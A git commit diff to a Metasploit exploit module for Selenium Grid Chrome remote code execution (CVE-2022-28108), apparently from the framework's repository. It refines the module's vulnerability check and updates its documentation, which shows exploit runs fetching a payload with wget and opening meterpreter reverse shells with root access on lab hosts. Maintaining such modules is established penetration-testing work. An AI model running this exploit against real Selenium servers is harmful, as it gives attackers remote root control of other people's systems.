Improve check

Takahiro-Yoko · Takahiro-Yoko · commit bbc282e90cbb · 2024-12-30T13:36:15.000+09:00
diff --git a/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md b/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md
@@ -56,7 +56,7 @@ Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
    ----                ---------------  --------  -----------
    FETCH_COMMAND       WGET             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
    FETCH_DELETE        true             yes       Attempt to delete the binary after execution
-   FETCH_FILENAME      jcInmtImuA       no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_FILENAME      OmbNmrIU         no        Name to use on remote system when storing payload; cannot contain spaces or slashes
    FETCH_SRVHOST                        no        Local IP to use for serving payload
    FETCH_SRVPORT       8080             yes       Local port to use for serving payload
    FETCH_URIPATH                        no        Local URI to use for serving payload
@@ -75,16 +75,16 @@ Exploit target:
 
 View the full module info with the info, or info -d command.
 
-msf6 exploit(linux/http/selenium_greed_chrome_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 rport=4444 ForceExploit=true
+msf6 exploit(linux/http/selenium_greed_chrome_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 rport=4444
 [*] Started reverse TCP handler on 192.168.56.1:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
-[+] The target appears to be vulnerable. Version 3.141.59 detected, which is vulnerable
-[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:46564) at 2024-12-29 12:14:52 +0900
+[+] The target appears to be vulnerable. Version 3.141.59 detected, which is vulnerable.
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:40990) at 2024-12-30 13:33:31 +0900
 
 meterpreter > getuid
 Server username: root
 meterpreter > sysinfo
-Computer     : 172.17.0.4
+Computer     : 172.17.0.5
 OS           : Ubuntu 20.04 (Linux 6.8.0-51-generic)
 Architecture : x64
 BuildTuple   : x86_64-linux-musl
@@ -94,16 +94,16 @@ meterpreter >
 
 ### selenium/standalone-chrome:4.0.0-alpha-6-20200730 installed with Docker on Ubuntu 24.04
 ```
-msf6 exploit(linux/http/selenium_greed_chrome_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 rport=4447 ForceExploit=true
+msf6 exploit(linux/http/selenium_greed_chrome_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 rport=4447
 [*] Started reverse TCP handler on 192.168.56.1:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
-[!] Cannot reliably check exploitability. ForceExploit is enabled, proceeding with exploitation.
-[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.16:59162) at 2024-12-29 12:15:49 +0900
+[!] The service is running, but could not be validated. Selenium Grid version 4.x detected.
+[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.16:34888) at 2024-12-30 13:34:30 +0900
 
 meterpreter > getuid
 Server username: root
 meterpreter > sysinfo
-Computer     : 172.17.0.5
+Computer     : 172.17.0.6
 OS           : Ubuntu 18.04 (Linux 6.8.0-51-generic)
 Architecture : x64
 BuildTuple   : x86_64-linux-musl
diff --git a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb
@@ -68,7 +68,19 @@ def check
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path)
     })
-    return Exploit::CheckCode::Unknown unless res&.code == 200
+    if res&.code != 200
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, 'status')
+      })
+      if res && res.get_json_document && res.get_json_document.include?('value') &&
+         res.get_json_document['value'].include?('message') &&
+         res.get_json_document['value']['message'].downcase.include?('selenium grid')
+        return Exploit::CheckCode::Detected('Selenium Grid version 4.x detected.')
+      end
+
+      return Exploit::CheckCode::Unknown
+    end
 
     js_code = res.get_html_document.css('script').find { |script| script.text.match(/var json = Object.freeze\('(.*?)'\);/) }
     return Exploit::CheckCode::Unknown unless js_code
@@ -80,10 +92,10 @@ def check
     # Extract the version
     version = Rex::Version.new(json_data['version'])
     if version == Rex::Version.new('4.0.0-alpha-7') || Rex::Version.new('4.0.1') <= version
-      return Exploit::CheckCode::Safe("Version #{version} detected, which is not vulnerable")
+      return Exploit::CheckCode::Safe("Version #{version} detected, which is not vulnerable.")
     end
 
-    CheckCode::Appears("Version #{version} detected, which is vulnerable")
+    CheckCode::Appears("Version #{version} detected, which is vulnerable.")
   end
 
   def exploit
@@ -114,7 +126,7 @@ def exploit
       'headers' => { 'Content-Type' => 'text/plain' },
       'data' => body
     })
-    fail_with(Failure::Unreachable, 'Connection failed') unless res
+    fail_with(Failure::Unreachable, 'Connection failed.') unless res
   end
 
 end
